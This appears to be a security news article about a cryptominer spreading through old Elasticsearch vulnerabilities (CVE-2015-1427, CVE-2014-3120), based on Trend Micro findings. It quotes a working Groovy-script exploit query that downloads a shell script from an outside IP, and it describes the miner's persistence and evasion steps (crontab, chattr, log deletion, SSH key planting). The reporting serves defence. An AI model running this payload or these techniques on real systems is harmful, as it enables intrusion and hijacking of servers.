New Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch

• Recently, a cryptomining attack was detected that exploited old vulnerabilities in Elasticsearch to propagate.
• The Elaticsearch vulnerabilities are CVE-2015-1427 and CVE-2014-3120.

Researchers detected a cryptomining activity that involved the open source search engine, ElasticSearch. The attack exploited two known vulnerabilities in Elasticsearch to propagate. The vulnerabilities included CVE-2015-1427 and CVE-2014-3120. These vulnerable versions are no longer supported by Elasticsearch.

• CVE-2015-1427 - a vulnerability in its Groovy scripting engine that allows remote attackers to execute arbitrary shell commands through a crafted script.
• CVE-2014-3120 - a vulnerability in the default configuration of Elasticsearch.

What happened?

Trend Mirco researchers detected a cryptomining attack exploiting the Elasticsearch vulnerabilities. They found a search query with the following command on a server running Elasticsearch:

“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P
/tmp/sssooo\”).getText()”}}}”

The command was run by the attacking host that hosted the payload. The system installed CentOS 6, which runs both web and SSH servers.

It is to be noted that this type of mining attack is not new. Earlier in November, Trend Micro detected a cryptocurrency miner targeting several countries such as China, Taiwan, and the United States.

The attacker distributed the bash script update.sh by first invoking the shell and running the download command with output set in the “/tmp/sssooo” file. Once the attacker gained the ability to run arbitrary commands on the system, he attempted to escalate the privileges to other systems in order to compromise the network.

Modus Operandi

The miner can download the following through wget, curl or url commands in a bash:

• Devtools
• Update.js - The bash script used by the miner to download all the parts
• Config.json - The configuration file for the miner

First, the miner attempts to save the files into the “/etc/” directory and tries the “/tmp” in case it fails. Then it checks for other ongoing mining activity in the machine. It assumes the device has already been attacked and hijacks the machine from its previous attacker. This process may also be used to update the running miner to a newer version.

The miner adds itself to the crontab scheduler so that it is run every 10 minutes. At the start of each run, it unlocks itself with “chattr -i“ and updates its files, while at the end of each run it protects the files with “chattr +i” which prevents the file from being modified or removed by other low privilege users.

The malware also covers its tracks by deleting the history logs. When the script is running in the root directory, the script tries to add its own SSH key to the authorized_keys, in order to login without a password. Somehow the command order looks buggy, causing the removal of authorized_keys right after the key is added.

The miner's other capabilities include:

• Network traffic encryption.
• Components protection.
• Persistence via crontab, a time-based job scheduler.

To prevent these types of cryptomining attacks from exploiting known vulnerabilities in Elasticsearch, it is necessary to regularly patch systems, keep systems up-to-date and establish proper security monitoring systems.